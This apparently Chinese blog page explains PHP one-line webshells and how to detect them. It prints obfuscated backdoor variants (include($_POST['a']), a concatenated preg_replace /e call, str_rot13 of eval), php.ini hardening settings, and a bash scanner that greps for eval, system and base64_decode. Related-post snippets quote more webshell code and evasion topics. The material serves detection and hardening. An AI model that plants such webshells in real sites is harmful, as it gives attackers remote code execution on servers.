php7 一句话木马,PHP一句话木马及查杀

常见的木马基本上有如下特征

1.接收外部变量

常见如:$_GET,$_POST

更加隐蔽的$_FILES,$_REQUEST…

2.执行函数

获取数据后还需执行它

常见如:eval,assert,preg_replace

隐藏变种:

include($_POST['a']);

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$hh("/[discuz]/e",$_POST['h'],"Access");

@preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');

使用urldecode,gzinflate,base64_decode等加密函数

3.写入文件

获取更多的权限

如:copy,file_get_contents,exec

一般的建议是打开safe_mode 或使用disable_functions 等来提升安全性;

可能有些程序无法正常运行,基本的安全设置

php.ini中

expose_php = OFF

register_globals = Off

display_errors = Off

cgi.fix_pathinfo=0

magic_quotes_gpc = On

allow_url_fopen = Off

allow_url_include = Off

配置open_basedir

查找木马脚本

查找隐藏特征码及入口可以找出大部分的木马.

#!/bin/bash

findpath=./

logfile=findtrojan.log

echo -e $(date +%Y-%m-%d_%H:%M:%S)" start\r" >>$logfile

echo -e '============changetime list==========\r\n' >> ${logfile}

find ${findpath} -name "*.php" -ctime -3 -type f -exec ls -l {} \; >> ${logfile}

echo -e '============nouser file list==========\r\n' >> ${logfile}

find ${findpath} -nouser -nogroup -type f -exec ls -l {} \; >> ${logfile}

echo -e '============php one word trojan ==========\r\n' >> ${logfile}

find ${findpath} -name "*.php" -exec egrep -I -i -C1 -H 'exec\(|eval\(|assert\(|system\(|passthru\(|shell_exec\(|escapeshellcmd\(|pcntl_exec\(|gzuncompress\(|gzinflate\(|unserialize\(|base64_decode\(|file_get_contents\(|urldecode\(|str_rot13\(|\$_GET|\$_POST|\$_REQUEST|\$_FILES|\$GLOBALS' {} \; >> ${logfile}

#使用使用-l 代替-C1 -H 可以只打印文件名

echo -e $(date +%Y-%m-%d_%H:%M:%S)" end\r" >>$logfile

more $logfile

/bin/bash^M: bad interpreter: 没有那个文件或目录

运行脚本时出现了这样一个错误，打开之后并没有找到所谓的^M，查了之后才知道原来是文件格式的问题，也就是linux和windows之间的不完全兼容。。。

具体细节不管，如果验证：

vim test.sh

:set ff?

如果出现fileforma＝dos那么就基本可以确定是这个问题了。

:set fileformat=unix

:wq

OK了。。。。。。。

/bin/bash^M: bad interpreter: 没有那个文件或目录

错误分析:

因为操作系统是windows，我在windows下编辑的脚本，所以有可能有不可见字符。

脚本文件是DOS格式的, 即每一行的行尾以来标识, 其ASCII码分别是0x0D, 0x0A.

可以有很多种办法看这个文件是DOS格式的还是UNIX格式的, 还是MAC格式的

解决方法：

vim filename

然后用命令

:set ff? #可以看到dos或unix的字样. 如果的确是dos格式的。

然后用

:set ff=unix #把它强制为unix格式的, 然后存盘退出。

再次运行脚本。

php7 一句话木马,PHP一句话木马及查杀相关推荐

超级BT木马的分析报告与查杀.
昨天载了一个代理猎手,然后中招了.按照以往的方法,结束进程,清注册表,折腾了一个晚上,实在痛苦.今儿早上,又折腾,7点到现在12点,终于把所有它加载与修改的程序和键值都找了出来.实在是BT啊,以下是我 ...
木马病毒的万能查杀方法
"木马"程序会想尽一切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的办法.只要把Form的Visible属性设为False,ShowInTaskBar设为False,程 ...
计算机病毒与木马知识doc,木马和计算机病毒的特点
木马和计算机病毒有什么相同点呢,下面是小编为你整理了相关内容,希望对你有帮助. 木马和病毒的相似点木马和病毒都是一种人为的程序,都属于电脑病毒,为什么木马要单独提出来说内?大家都知道以前的电脑病毒的 ...
360安全卫士的云查杀原理介绍[转]
我有两个感觉:第一个是关于杀毒软件,一个已经做20年的行业,它的核心技术可以说是一直基于收集病毒样本,采集病毒特征,组成病毒库,在每个用户的机器上按图索骥,像通缉令查坏人一样去查杀病毒.现在木马起来之 ...
php7 一句话木马,PHP一句话木马后门
在我们进行渗透测试的最后阶段,入侵到内网里,无论是想要浏览网站结构,还是抓取数据库,或者是挂个木马等等,到最后最常用的就是执行一句话木马,从客户端轻松连接服务器. 一句话木马的原理很简单,造型也很简单 ...
php7 一句话木马,PHP一句话木马研究
*本文原创作者:Gxian,本文属于FreeBuf原创奖励计划,未经许可禁止转载最近在研究PHP一句话后门,查阅了很多大佬的博客,并从中衍生出了一些可用的方法. 现总结如下: 方案一:回调函数回调函 ...
一句话木马：初识木马练习
一句话木马: 不是mua,木马是根据撰写了恶意代码的文件,以实现恶意攻击的目的. 一句话木马就一句话,配合中国菜刀等工具可以实现数据的摄取. php木马: <?php @eval($_POST[ ...
php一句话工作原理,一句话木马的工作原理
一句话木马的工作原理:一句话木马分析服务端与客户端. '一句话木马'服务端(是用于本地的html提交脚本木马文件) 就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件) ...
php一句话大全,[各种一句话木马大全]各种一句话
PHP一句话: 1.普通一句话 2.防爆破一句话 <?php substr(md5($_REQUEST['x']),28)=='ac3a'&&eval($_REQUEST['pa ...
silic group第五版php木马,php一句话后门特征码与免杀-zz
作者:YoCo Smart 来自:Silic Group Hacker Army [BlackBap.Org] 首先我们要明白什么是一句话木马. "一句话"是一种特征性很强的脚本后 ...

php7 一句话木马,PHP一句话木马及查杀

php7 一句话木马,PHP一句话木马及查杀相关推荐

最新文章

热门文章